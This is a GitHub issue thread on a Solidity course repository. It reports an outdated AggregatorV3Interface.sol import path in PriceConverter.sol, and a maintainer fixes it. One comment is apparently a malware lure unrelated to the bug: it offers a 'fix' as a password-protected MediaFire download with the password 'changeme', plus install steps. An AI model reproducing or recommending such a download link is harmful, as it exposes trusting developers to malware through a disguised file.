### ISSUE TITLE
Inconsistent paths for the aggregatorv3interface.sol import

### ISSUE THREAD

**Issue by beatkuster** [Cyfrin/remix-fund-me-f23#10]
The path for the aggregatorv3interface.sol import has already been updated in the contract FundMe.sol with following commit:
https://github.com/Cyfrin/remix-fund-me-cu/commit/716691d31843cefc409433639cbc49d56fc23f6c

The path should also be updated in contract PriceConverter.sol. Otherwise this causes an "invalid implicit conversion" error as discussed here:
https://github.com/Cyfrin/foundry-full-course-cu/discussions/2331#discussioncomment-10505224

Please let me know if something remains unclear / more information is required. Thanks!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by cromewar** [comment]
You are right @beatkuster, thanks for your contribution, would you send a PR with this changes?

**Comment by cromewar** [comment]
I've added the correct import to the AggregatorV3Interface.sol using shared, thanks for the report @beatkuster

**Comment by beatkuster** [comment]
Hi @cromewar, you were faster with correcting than I with the opening the PR. Thanks a lot for maintaining these awesome course materials, they are incredibly helpful!
